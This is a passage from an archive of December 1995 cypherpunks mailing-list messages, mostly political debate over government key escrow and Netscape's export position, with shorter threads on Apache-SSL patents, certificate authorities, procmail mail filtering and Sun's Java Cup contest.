From: sameer <sameer@c2.org>
Date: Sun, 3 Dec 95 17:34:08 PST
To: nobody@REPLAY.COM (Anonymous)
Subject: Re: apachessl info
In-Reply-To: <199512040015.BAA22063@utopia.hacktic.nl>
Message-ID: <199512040129.RAA19146@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> What I missed was the how-to on getting a certified key. Wasn't there a way
> of doing that through e-world (Apple's on-line service) for free?

	"Low-assurance" client keys are free. Server keys are not free.
http://www.verisign.com/

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael H. Warfield <mhw@wittsend.com>
Date: Sun, 3 Dec 95 14:29:53 PST
To: cypherpunks@toad.com
Subject: Re: your mail
In-Reply-To: <199512031959.OAA00178@localhost.cjs.net>
Message-ID: <m0tMMvg-0001TUC@wittsend.com>
MIME-Version: 1.0
Content-Type: text/plain


Christopher J. Shaulis enscribed thusly:

> My mail??

> Who is the wise guy who keeps putting "Your mail" in the topic?

	Kidding, right?  Snicker.

	It's not a who - it's a what.  Some twit DID NOT put a subject on the
ORIGINAL message.  The next person(s) who replied to him had a mail program
which recognized the lack of a "Subject" and substituted "Your mail".  That
beats a subject line of "Subect: Re:"...

	Actually and technically they don't bother to "spot" the lack of
a Subject.  The programs set their default subject for replys to "Your mail"
and then if the read a Subject header, it overrides the default.  I know
elm does and I believe pine does, as well as a host of others.  

	Works well for personal mail even if it does look STUPID on a
mailing list.  Only known cure is to make sure you have a REAL SUBJECT.

> Christopher


-- 
 Michael H. Warfield    |  (770) 985-6132   |  mhw@WittsEnd.com
  (The Mad Wizard)      |  (770) 925-8248   |  http://www.wittsend.com/mhw/
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 3 Dec 95 18:07:08 PST
To: rthomas@pamd.cig.mot.com (Robert Owen Thomas)
Subject: Re: Globally legal Netscape
Message-ID: <199512040209.SAA03343@ix12.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Fred Cohen wrote:
> Law enforcement is almost universally used as an excuse to
> collect information on individuals in the name of helping society,
> but this power is easily abused.

In addition to Fred's good examples of abuse of information, 
I'd like to add the use of census data to arrest Japanese-Americans during
World War 2 - not only was the data collected under great promises that
citizens could trust the government, and that it would only be accessible
for lawful purposes, it was used to attack people who weren't doing
anything illegal or wrong when it was collected.  

Everything you say on the nets sticks around, and if the government
has master keys, then even what you said in private sticks around.
It's not illegal to say "[expletive deleted]" in private mail today,
and won't be even after Exon-II passes, but it _may_ be kept around
so they'll know whose mail to get law enforcement access to to enforce
the Verbal Morality Act of 2001.

At 04:26 PM 12/3/95 -0600, rthomas@pamd.cig.mot.com (Robert Owen Thomas) wrote:
>look, this is just a *bit* extreme.  having been one of those folks sworn
>to uphold the Constitution, I can tell all of you that there is no master
>plan to rid the American people of their rights and freedom.

Remember the fundamental job of any bureaucracy - self-preservation and growth,
by whatever means necessary.  No need for any master plan or conspiracy.
Are there herds of opportunists interested in taking political advantage of
anything
that comes their way?  You bet.  Listen to Louis Freeh talk about
the need to be able to eavesdrop on anybody they want to be able to catch
narco-terrorist child pornographers, and think about whether you want the FBI
able to tap your email - especially if you occasionally send email to people
whose chronological age you don't know using language that Senator Exon
might disapprove of.  Reminds me a lot of Harry Anslinger talking state
governments into banning Evil Marihuana in the waning days of Prohibition.

>o  Robert Owen Thomas:  Corvette pilot. Cymro ydw i. User scratching post.  o
                                         ^^^^^^^^^^^
Between the anti-encryption cops and the English-Only right-wingers,
you may not be able to say that much longer - Welsh isn't quite as heavily
encrypted as, say, Navajo, but it's bound to violate some law soon enough :-)
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281

# Anybody notice that Microsoft's Wide Open Road ad has barbed-wire fences
# on both sides of the road?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 3 Dec 95 09:29:56 PST
To: cypherpunks@toad.com
Subject: Re: Talking to Jim
Message-ID: <199512031730.SAA06145@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Jim Clark was quoted as having written:

> I made some pragmatic comments.

> I said that if we are to use this encryption technology in 
> business, we must have a better solution than to limit 
> keylength or put keys in escrow. All governments of the world 
> have a valid concern about terrorism and other activities of 
> concern to the security of their nations. 

So what?  If their position were (as it has long been in some countries) that their "concern" is best addressed by wholesale eavesdropping and informant networks, would you cave to that, too? This is an absurd foundation.

> All of them will continue to restrict our ability to provide 
> products to their markets unless we build in some mechanism 
> that allows them to legally access information that is in the 
> interest of their national security. 

Whoa!  You're giving away the store without a fight!  You've been able to capture what, 60-70% of the browser activity "market" and get a huge amount of capitalization from the public market, and you're whining that the world's going to end if government "restrictions" continue, just because those restrictions might slow down your commercial world conquest? Give me a break! 

LET THEM CONTINUE to restrict! That will take care of itself quite handily. You're just afraid you'd miss some opportunities, or be one of the commercial casualties, isn't that right? Isn't that what this is really all about? And a valid concern, too, but not at the expense of my freedom! It seems clear from the way you put this that world standardization at ANY level of security would satisfy your commercial objectives. 

> (We obviously cannot be involved in determining what is legal 
> by the laws of that country.) 

Oh? Since when? Commercial interests have long had a heavy influence on government policies, up to and including laws and wars. Your own U.S. government doesn't hesitate to attempt to influence other governments in their enactment and/or modification of laws, even constitutions. Do you think for a moment that the Caribbean Basin Initiative (to mention just one) has anything remotely to do with the U.S.'s altruistic interest in helping Basin countries' economies? Its OVERRIDING purpose is to influence their tax laws and effectively extend U.S. jurisdiction to those countries.

In any case you're writing as if you were selling screwdrivers, not the new wave of IT. You are riding the crest of a technological revolution that is going to make some laws, some governmental policies, even some governments, MOOT. Those it doesn't bypass it will certainly not leave untouched. To be sure, there is awesome power in the hands of governments, but it is also a fact that governments can be very fragile things. Many have fallen in the history of humankind, and modern "free" societies are supposed to have governments that serve, not dictate.

Governments, geared to human processes that proceed at human speeds, unable in their inefficiency even to keep up with ordinary humans, will be completely unable to stay ahead of IT. Governments that get in the way will disintegrate. Governments that embrace the future will survive. For you or anyone else to run around to the rear and stick their tongue firmly up government's ass is exactly the wrong strategy for the future.

> This is not just a US government problem. Until recently, 
> France did not even allow us to sell products with 40-bit 
> keys, much less 128-bit keys. 

And some of us think that such idiocy, like celibacy, is a self-correcting phenomenon in this information age. If the French government wants to keep France behind the curve, that's fine. The French people will eventually put fire to their politicians' feet as their economy is increasingly bypassed and slides down the tubes. It's not YOUR problem to solve by going into agreement with the totalitarian objectives of Stone Age governments.

> A lot of ordinary citizens are rightly concerned about their 
> own privacy. 

No shit!

> I am one of them. 

You could have fooled ME!

> I do not want the government to snoop on me, 

It seems you really don't care, as long as you can firm up your billion and maybe roll it up to ten.  Money buys a lot of things in this world, and as long as Jim can buy HIS privacy some day, hey, that's cool! But give a bit of thought to whether your children's privacy and safety will be able to be bought in a world made safe for Big Brother by commercial interests willing to give away the freedom store.

> but in fact the government, through the FBI, can now tap my 
> phone without my knowing it by simply getting sufficient 
> evidence that I am conducting illegal activities, then 
> presenting this evidence to a court to get permission. I have 
> no say in the matter.

So, therefore, nothing matters, right?  Don't fight for the right to put locks on your doors, because if the government really wants to get in your house, they will. Here's a flash bulletin, Jim: That's not the kind of thinking that secured the freedoms Americans like to think they have. It is, though, the kind of thinking that can end them.

> If we as a company were to take the position that in no case 
> will we allow a government to get access to our encrypted 
> messages, or refuse to allow key escrow with our products, 
> the governments of the world will quickly put us out of 
> business by outlawing the sale of our products in their 
> countries. 

Obviously specious, because Netscape came into existence in a world of controls over which it had no influence.  Having thus come into existence, and quite successfully so far, it is absurd to claim that if you don't cave and become supine enough to slide under the barriers that already existed, you will be put out of business.

I believe you have underestimated the power of a leading-edge 21st-century information product that is "Not available where regulated." I think you're copping out and looking for the easier, "Now with the best encryption available! (because no one is allowed to offer better)"

> The fundamental issue is how do we accommodate the 
> requirements of governments, while protecting our 
> rights as citizens.

No, Jim, that is not nor has it ever been the fundamental issue for business or individuals, least of all in the last few centuries in the free world.  The issue for free people is how to secure the blessings of freedom, shaping government as necessary, so they can get on with their lives, which in turn is, after all, what everything is ultimately about.  Your statement is more suited to the European authoritarian mindset, which has never quite come to grips with the idea of natural rights originating in individuals and flowing, WHEN AND IF THEY FLOW, by delegation to governments.

The legitimate purpose of government is not to tell you what your boundaries and constraints are. The Declaration of Independence correctly states that the legitimate purpose of government is to secure freedoms which do not themselves originate in government.

> None of this represents the position of Netscape with 
> respect to what we will do. 

Oh, garbage! You've just set forth the viewpoints of one of the key people who determines what Netscape's positions will be, and further, that you agreed in this with a bunch of other commercial interests! 

> But if we do not come up with a solution to this problem 
> that is acceptable to each government, 

There it is:  Supine, prostrate, submissive.  Jim, there are some alt. newsgroups where you could make a bit hit with that approach.  A few thousand Mistress X's in leather await a man willing to obey their every command.

> we will not be able to export our products, 

Whiiiiine!

> except with a short key length (e.g. 40 bit keys), and that 
> will not be acceptable to corporate customers in other 
> countries. They will create their own solution, and we will 
> not be able to sell to a larger world market. 

This is the heart of the matter. Dominating the U.S. market is in no way sufficient to your appetite. Maintaining a clear technological lead here, with consequent pressure on controlled markets to lift their controls and to pressure the U.S. to lift its export controls, is not what you see as the better strategy. You fear losing momentum, you covet those foreign markets, perhaps you even fear the emergence of superior foreign technology given clear incentive over time. 

Your choice, then, is to be an instrument in furtherance of totalitarianism in order to improve what you perceive to be your shorter-term odds, and to justify it on the basis that it is inevitable anyway. Bad. Very bad.

> In fact, we could even be ordered by our own government to 
> establish a key escrow system for its use inside the US.

You seem to have walked so far down the road of saluting government that you've forgotten that there is a Congress. This is supposed to be a government of laws, not orders. It's an entirely different issue, though, than the one of embracing GAK in a bid for world browser conquest. If U.S. GAK comes to pass, it will not be without discussion and debate, some of it no doubt quite heated. Everyone will have to deal with it as they see fit. That's not the same thing as a cow offering itself for genetic engineering in order to slither a new, longer neck under the bottom strand to reach that greener grass at the expense of its legs (that's tortured, but I think it makes a nice image).

Your manner of expression supports my impression that someone has innoculated you with GAK juice.  The power of influential people to do that, and to follow through on their veiled or not so veiled threats depends entirely on their remaining unseen to the public. I'd STILL like to know who got to you and what they said.

> Ironically, anyone in the US may import unbreakable 
> encryption technology from another country -- we just 
> cannot sell it back to them. No one ever accused the 
> government of being rational.

This is the clearest thing you've written in the whole piece (though it sheds no light on Netscape's position). Makes you want to kick yourself for not having set up shop in some other country in the first place, doesn't it?  

You can BET that other people ARE setting up shop in other countries, even as we write. The logistics of information over distance are collapsing at an astonishing rate. What would have been difficult or prohibitively expensive five years ago is feasible today. What seems too much trouble today will be a piece of cake next year.

What you *could* have done early on, had you or anyone else clearly seen where this was headed (and hey, who did?), would have been to contract with a resource in a crypto-unregulated jurisdiction, perhaps even one where constitutional or legislative bars to such control exist or could be construed, to license the necessary parts your company in the form you need them. Done right, this could have positioned you to import the crypto as it could be imported into any supposedly free country, penalizing thereby only the thoroughly clueless countries. You would never have been in the position of exporting it. If the dotted line in your product can't be at the "hooks" level because of restrictions, there is some level higher than that and lower than "run netscape" at which the dotted line CAN be drawn and still pass muster, or all software in the world would be stillborn.

Too late now, eh? Maybe. Maybe not.

> I chair an industry group called the "Global Internet 
> Project", with members from almost twenty companies, 
> including companies from Asia and Europe. This was the 
> central issue we all agreed upon this morning, and we 
> are putting together a policy statement whose purpose 
> is to educate lawmakers on the importance of quick 
> resolution of this matter.

That's scary. You'd be better advised to hang around with people steeped in the rugged individualism of America's genesis. If you put your efforts into creating irresistible forces in the marketplace you could leave the process of educating lawmakers to their constituents, who would do it by putting political fire to their feet, something to which politicians respond better and faster in any case.

How many of the people who pay your bills do you think will be comfortable with the idea of you cuddling up with a bunch of other self-appointed world planners (some of whom no doubt come from countries where freedom is a quaint notion that has never quite been fully grasped), dividing up their freedoms and handing them to governments on a silver platter, presumably in exchange for injections of grease to your money machine?

> Thanks for your concern. 

You're welcome.

> Let me know what you like and don't like.

Now you know.

One of the great values in the new information paradigm is that you can, if you choose, read messages no one would have dared bring you in the insular past. Executives who get to hear only what they want to hear usually fail, often spectacularly. Any executive in a publicly-discussed business today who wants to take the pulse of real people has only to tune in and see for himself. It takes courage, though.

We Jurgar Din
(that will have to suffice: I do not yet live in a free country)

+"The battle, Sir, is not to the strong alone. It is to the+
+vigilant, the active, the brave. Besides, Sir, we have no +
+election. If we were base enough to desire it, it is now  +
+too late to retire from the contest." -Patrick Henry 1775 +


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMMHTCUjw99YhtpnhAQFq8gH+Kr2QhcP7wWh0jdOM+2UBWldm0jDgcR5p
HTXsoHbYVc8Q8LRwpcV33T4Jq+z7OTFGBX7RuyIRDkGSmloZ6NGbag==
=Skic
-----END PGP SIGNATURE-----










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Sun, 3 Dec 95 18:56:37 PST
To: cypherpunks
Subject: Java Cup International -- $1,000,000 in prizes
Message-ID: <9512040256.AA14558@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


[Wouldn't it be fun to win an UltraSPARC for writing some free code to
secure Java applications?  The catch is: No entries can use
encryption!  I wonder how they expect electronic commerce, security,
or micropayment systems without encryption.  See the Official Rules.
-- John]

Sun Microsystems has announced the JAVA Cup International, a contest
to promote the creation and public availability of small,
platform-independent applications called JAVA applets. Software
developers will compete to develop the most innovative and creative
applets. The JAVA Cup International contest begins immediately and
ends March 31, 1996.

Who's Eligible: Developer community including business, academic, and
individual programmers worldwide.

Prizes: Prizes will total $1,000,000 in Sun equipment (U.S. list)
distributed among winners. One grand prize and three prizes per
category (two individual prizes and one team prize). The first 1,000
to submit entries will receive a Java Coffee Cup & T-Shirt.

Categories: Productivity Tools, Internet/Web Agents, Educational,
Developer Tools, Entertainment and Games, Unlimited.

Judging Criteria: Best Graphics, System Friendliness, Clean Code,
Security, Reliability, Interactivity, Innovation.

Check out http://javacontest.sun.com for complete details. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 3 Dec 95 10:07:09 PST
To: cypherpunks@toad.com
Subject: Jim Clark, "Mr. Bubble"
Message-ID: <199512031807.TAA07090@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Alex Strasheim, 12/2/95, 6:53 PM:

>I don't expect Netscape, as a corporate citizen, to engage in civil
>disobedience.  But I hope that Netscape will take seriously its obligation
>to protect the rights of citizens. 

      I do. I regard the capacity to do so as crucial, and I regard the
fact that you *don't* expect them to as very telling. As has been pointed
out extensively, the chances that he'll manage to hang on to his
soft-earned cash until he can sell out are a long shot--unless he takes a
stand against GAK. Governmental policy on the subject of crypto has relied
upon secrecy, obscurity, and above all terrorizing individuals; the gov't
would be extremely reluctant to throw the book Netscape, given its
symbolic significance in the market. And even if it did, Clark's future
would be assured--maybe after he got out of Club Fed, but assured
nonetheless.
      Let me be clear: if Clark and Netscape said "We're implementing and
releasing a version with a key length we support," crypto policy would be
the lead story on the evening news--and the gov't would lose. The only
question is how fast. 

>The decison that Netscpae is faced with now is a big one.  It's going to 
>have widespread and long lasting consequences for privacy and civil 
>liberties all over the world.  When you look at what's going to happen on 
>the ground, it's probably as important as a major decision by the Supreme 
>Court.
>>We understand that government officials in this country and elsewhere are 
>putting pressure on Netscape.  But you should understand that the public 
>is overwhelmingly in favor of universal access to strong crypto.  This is 
>a democracy, after all, and the FBI and NSA still work for the people.  
>If you need help standing up for what's right, you'll get it.  Take your 
>case to the public, and you'll be suprised at the response you'll get.

      You set forth all these silly generalities as though they suggest
that NS's best bet--for Clark, for itself, for the public--is to go along
with US policy? Bullshit. Their best bet is to use their golden-boy status
to sucker punch the gov't.

>Why not say:
>
>        1       Netscape will follow all laws and regulations.
>        2       The current rules are forcing Netscape to choose
>                between providing reasonable levels of privacy
>                to its customers and competing in the international
>                marketplace.
>        3       Netscape feels the rules should be changed to make
>                this choice unnecessary.

      Bah. Why not:

      1     Make illegal software available by FTP
      2     Explain it's doing so because ITAR is bullshit
      3     Face the gov't down in the press and in the courts 

>If you make that argument publicly, you'll get widespread support from the
>business communitity and the general public.  And if it turns out that we
>can't win, you can always fall back on selling totalitarian-friendly
>products.

      If NS did this, they'd win BIG.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMMHndb3g0mNE55u1AQG3cAH/dQnrTUyZRIdz1P3lTGhQzOqvG2NSWdeh
YVYPN+wTZBfnBWlMwIkODAuyafbyFEGr5+lsgTBOtYDCVWFsW8LdWQ==
=+Wxw
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Sun, 3 Dec 95 16:20:16 PST
To: rthomas@pamd.cig.mot.com (Robert Owen Thomas)
Subject: Re: Globally legal Netscape
In-Reply-To: <9512031626.ZM17818@pamd.cig.mot.com>
Message-ID: <9512040017.AA26026@all.net>
MIME-Version: 1.0
Content-Type: text


> look, this is just a *bit* extreme.  having been one of those folks sworn
> to uphold the Constitution, i can tell all of you that there is no master
> plan to rid the American people of their rights and freedom.

The problem is that there is no master plan to uphold it.  Freedoms are
rarely lost all at once.  Rather they are nibbled away in the name of
crime control, keeping people from hurting themselves, religious beliefs,
and the like.

> this is not to say we should not keep a sharp and keen eye open for any
> assault upon our liberties.  rather, having "BEEN THERE", i just do not
> see any threat along the lines of, er, Hitler, Stalin, Mussolini, et. al.

Nobody in power saw the threat of Hitler even after he invaded Poland. 
In the early days, the Jews thought that being identified as Jews was no
big deal.  The Chinese cameras were portrayed as a way to reduce crime. 
The files kept by Iraq on the Kurds were supposedly used to track
criminals.  Law enforcement is almost universally used as an excuse to
collect information on individuals in the name of helping society, but
this power is easily abused.

	- It was abused in the US in the 60s against blacks seeking equal
	rights - in the name of civil order.

	- It was abused in the 50s against Americans who were even
	peripherally associated with the Communist party - in the name
	of civil order.

	- It is being used today in the name of stopping white supremicists
	and drug dealers - in the name of civil order.

Just like in the 50s and the 60s, the FBI is the one pushing for more
wiretaps and less privacy, and just like the 50s and 60s, people are
buying the anti-crime claim when in fact, this is about political power
over the rights of individual citizens.

Now I don't necessarily support more than one of these three causes, but
I do know that when one person loses their right of privacy, we all lose
our rights as well.

> let's try to keep this in perspective, Fred.  perhaps a little less
> caffiene would help?  ;-)

I haven't had any Caffine lately, but I did go for a nice hike this morning.
It's a natural high.

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 3 Dec 95 19:26:27 PST
To: JHupp@Gensys.Com
Subject: Re: Apachessl (was your mail)
In-Reply-To: <2B69E5170C1@Novellnet.Gensys.com>
Message-ID: <199512040321.TAA23272@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 	Personally, I would prefer to see the whole thing given away, and if I
> had done it, it would be.  But he (or his contractors / employees ) did
> the work that went into modifying it, and if he want's to sell that
> work he bloody well can.

	Hell, *I'd* prefer to see the whole thing given away. Ain't
gonna happen though. It's called US patent law. (I would have put
*much* less work into it, if it was going to be given away, though, so
the fact that people have to pay for it actually results in a better
non-commercial version as well. [the only thing you don't get with the
non-commercial version is commercial use licensing for the patent
stuff and support..])
	Maybe though, if the various lawsuits disputing the patents go
through and the patents are found invalid or something, commercial use
will be possible for free.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Campbell <edge@got.net>
Date: Sun, 3 Dec 95 17:55:30 PST
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <199512040320.TAA29525@you.got.net>
MIME-Version: 1.0
Content-Type: text/plain


>Gee, and Tim May didn't get a new ISP when his current PC-ISP canceled 
>his Usenet access because of his protected speech and then gave it back 
>only if he included a disclaimer on his messages.  Fire away, Cypherpunks!!!

Get your facts straight before spewing this nonsense to the masses. There's
not an ounce of reality reflected anywhere in that whole sentence.
--
   Jay Campbell                edge@got.net - Operations Manager
   -=-=-=-=-=-=-               Sense Networking, Santa Cruz Node
   Jay@Campbell.net            got.net? PGP MIT KeyID 0xACAE1A89           
 
"On the Information Superhighway, I'm the guy 
  behind you in this morning's traffic jam leaning on his horn."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sun, 3 Dec 95 16:29:06 PST
To: Jonathan Zamick <JonathanZ@consensus.com>
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <v02120d02ace53224f233@[157.22.240.13]>
Message-ID: <Pine.BSF.3.91.951203191056.6206B-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 1 Dec 1995, Jonathan Zamick wrote:

> 
> >And thus we return to my original point, which is that it will depend on
> >what is said/disclosed.  If every copy of GAKscape had a banner, bigger
> >than the Netscape "N" which said, "The government can read every message
> >you send using this software no matter what you do" then I think
> >consumers will be hard pressed to say they weren't warned.
> 
> I don't mean to be inflamatory, but it isn't much of a point. They aren't
> going to put such a banner up because that would limit their business. The

Once again, I must disagree.  Several bulletin boards I frequent include 
an opening banner announcing that, essentially, all messages left there 
are "public" and can be read by anyone.  I can get the exact language if 
you like.  The message specifically refers to the wiretapping statute, 18 
U.S.C. Section 2510 et seq.  This keeps the sysop, arguably, from 
suffering civil liability if mail is intercepted.  Nobody reads the 
banner, but I believe that it has more effect than a fig leaf.

> goal of Netscape (though I don't single them out), any corporation that would
> profit from business of those who seek encryption while still allowing GAK,
> and the government, is to limit the public's awareness of the size of the
> hole. If they let people know the extent of the hole, then they'll use
> products w/out it which blows profits from companies involved, and doesn't
> benefit the government who want it in common use.
> 
> >I disagree.  Almost nobody read the fine print on the back of a note you
> >sign when you buy a car or otherwise take out a loan, but the provisions
> >are generally enforceable ...  Ignorance is not necessarily an excuse.
> 
> The question is whether there was false representation of the security of
> the product.
> 1. The general knowledge of encryption and secure electronic financial
> transactions is significantly lower than that of more standard
> transactions.
> 
But how many of those who are less knowledgable about such things expect 
the level of privacy you automatically infer?  Is that expectation 
reasonable?  Does the party have any duty to inquire???

> 2. Applying for a loan or buying a car involve actively going out, negotiating,
> signing contracts, etc. It will be much simpler to simply stick your vital
> info into a 'secure' browser.
> 
Getting a browser involves going to the store and installing the software 
or surfing to a site and downloading the software.  Then it must be 
installed.

> 3. The choice of browser to use will be done, based on representations by
> companies about the security of their product. If Netscape doesn't
            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 
I doubt it in the case of the less sophisticated (and the more 
sophisticated are on their own).  I suspect that Mr. Newbie is more 
likely to pick a browser on the basis of what his friend tells him,  or 
what PC Computing tells him, or the fact that he read about Netscape in 
the business section of the paper.  

> explicitly
> state in direct terms when accessing the browser that the GAK is a
> potential security risk, then they will be sued. Simply because someone
> will get blamed.

Getting sued and being liable are very different, just as getting charged 
with a crime and having done something morally wrong can be very 
different.  I am much less confident than you apparently are that the 
court system (and products liability law) are likely to impose duties on 
the makers of browsers such as you suggest.  In an advancing 
technological area, I don't believe that liability will be imposed so 
quickly, especially if some disclosure is made.  What disclosure is 
required is likely to be fact specific on a case by case basis until the 
law has time to develop some sort of standards.

Can I expect to recover from Ford for my injuries in a car wreck because 
I would not have been hurt in a Volvo, when Ford meets all federal 
standards?  Generally not. 

> Since they (or again any company that incorporates GAK.. I really don't
> want to target Netscape in specific) will make the threat sound as
> insignificant as possible, and not bring it to people's attention (and they
> can't afford to do so) when (not if) it is breached they will be taken to
> court repeatedly.

Don't forget, taking them to court takes $$$.  And they only have $5 
Billion to pay for lawyers ...

 > > >
> >EBD
> 
> Jonathan
> 
> ------------------------------------------------------------------------
> ..Jonathan Zamick                    Consensus Development Corporation..




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jadestar@netcom.com (JaDe)
Date: Sun, 3 Dec 95 19:34:23 PST
To: adam@homeport.org (Adam Shostack)
Subject: Re: available news/mail filtering
In-Reply-To: <199512012326.SAA20363@homeport.org>
Message-ID: <199512040332.TAA07600@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Beavis B. Thoopit wrote:
> 
> | What news and mail filter programs are available?  Pointers
> | will be appreciated.
> 
> I like procmail.  Its a steep learning curve, but well worth the
> effort.
> 
> ftp.informatik.rwth-aachen.de:/pub/packages/procmail/procmail.tar.gz 

	I disagree about the grade of the curve.  However I might 
	have bumped into better learning resources.  I'd suggest
	the following URL (lynx clean for us non-GUI CLImbers and 
	CLUEful types)*:

	http://www.jazzie.com/ii/faqs/archive/mail/filtering-faq/

	This is maintained by Nancy McGough (nancym@ii.com??).

	She and Stephen R. van den Berg (author of procmail) are
	active on the procmail mailing list:
		procmail@informatik.rwth-aachen.de

	And of course, subscription and information requests 
	for this list to:
		procmail-request@informatik.rwth-aachen.de

		----------------------------------------

	I suppose (since this is my first posting to cypherpunks)
	I might as well introduce myself.  I've been lurking on the 
	list for about two weeks.  This is the busiest list that
	I'm subscribed to.  By comparison the Pegasus Mail list 
	only gets a hundred messages a day.  Well that one's at work
	so I see it every day -- the ones here at netcom I might
	flake on for a few days at a time.

	I've had a mild (armchair) interest in crypto since I was 
	in high school.  I heard of this list via netnews but actually
	got the address from someone at a Kabuki-west (a fairly
	small, discreet Bay Area social mailing list that's used to organize
	weekly dinners at area restaurants and announce other food related
	events to aspiring computer nerds -- such as me-- and other 
	professionals).

	Given my lack of schooling and formal study on the subject 
	I probably won't have much to say on this list.  Given the 
	volume of postings, and the relatively high signal to noise
	ratio (lots more politics than actual discussion of the 
	technology from what I've seen) I'll be very lucky if I can
	wade through all this on weekends.

	My name is Jim Dennis.  I'm a sysadmin (and webmaster, postmaster,
	and backup Netware supervisor) for a medium-sized software 
	publisher in the Bay Area.  I used to do tech support for 
	places like Quarterdeck and Symantec.  I've also done some 
	SQA.  Most of my experience is with DOS/Windows and PC's --
	but most of my recent work is on Linux, FreeBSD, SunOS and 
	Solaris.  I most frequently post answers to the *.lang.awk
	newsgroups (which I'm writing an FAQ for). 

	JaDeStar = Ja(mes) De(nnis) + Star(shine) [my girlfriend].
	There's an alias to this account: starshine@netcom.com
	which hits a procmail script and gets redirected to Heather's
	(Starshine's) current e-mail address at work.  This has been the 
	easiest way to ensure a continuity to her e-mail address
	from one employer to another.   She hardly ever logs into 
	this account otherwise.

	If you want to know more about me -- ask in e-mail (off the 
	list).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 3 Dec 95 18:30:23 PST
To: Brian Davis <cypherpunks@toad.com
Subject: Evil Prosecutors on the List
Message-ID: <ace795de2a021004207c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:30 AM 12/4/95, Brian Davis wrote:

>I feel slighted.  No one accused me of lacking principles because I
>haven't quit my job with the Justice Department based on its, and the
>Administration's, position.

Speaking for myself, I simply assumed you were a prosecutor handling the
"legitimate" cases, as the OJ prosecutors were (granted, different types of
cases). Despite my libertarian leanings, I suppose many or even most
prosecutions actually involve real crimes of fraud, theft, embezzlement,
etc., at least based on what I read of pending court cases. Though there
are probably a lot of "crimes" prosecuted that I don't think of as real
crimes.

A college friend of mine is married to a woman who's a prosecutor in
Brooklyn, and one of her cases involved prosecuting some poor shlub who was
caught committing the dastardly crime of _smuggling his own money_ out of
the country! (Tens of thousands of dollars, not the millions that a drug
case would involve, not that it matters to me, but it might to some.) My
point? I did not insult her when she mentioned this, just said something
like "Well, I don't view it as a crime." She of course understood, as her
husband is a libertarian like me.

(I could never be a prosecutor, or even a successful defense attorney, as I
would feel it necessary to decide on each case whether prosecution/defense
is justified.)

I suppose I don't impute evil to very many people at all. I view some
_institutions_ as counterproductive and at odds with the principles of free
association and non-agression that this country was founded on, and it is
the _institutions_ I think need changing. Fortunately, strong crypto is the
right kind of tool at the right time. (I think my hero Tom Jefferson would
really have gotten a kick out of this stuff, especially considering that he
invented his own ciphers for private communication....not a lot of doubt
what he'd have thought about a scheme for the government to have access to
all business transactions, all conference calls, all private e-mail, and
all international letters.)

But I don't think of Dorothy Denning, for example, as an "evil" person,
just as someone whose assessment of the tradeoffs, and whose political
power of course (she having the ear of the leadership), is much different
from mine.

And I've met Stewart Baker, former chief counsel of the NSA (and
past/present advocate of restrictions on strong crypto use), and he's quite
knowledgeable and reasonable. (I hope readers will spare us the usual
responses along the lines of "They say Hitler was very charming." Monsters
can indeed be deceptively charming, but I don't think for a nanosecond that
Stewart Baker, Louis Freeh, Dorothy Denning, or Jim Clark fit into this
picture. My point is that reasonable people can have disagreements, even
disagreements which they cannot compromise about, without any requirement
that one or the other be "evil.")

Getting back to Baker, it is clear we disagree. He may even think me
irresponsible for advocating "anarcho-capitalist" views (*), but we were
able to communicate civilly at the last CFP and even shared a panel. I
think he understands my libertarian positions, and I think I understand his
concerns. As it happens, I'm just not convinced that stopping some number
of crimes is sufficient reward for outlawing privacy. Mounting cameras in
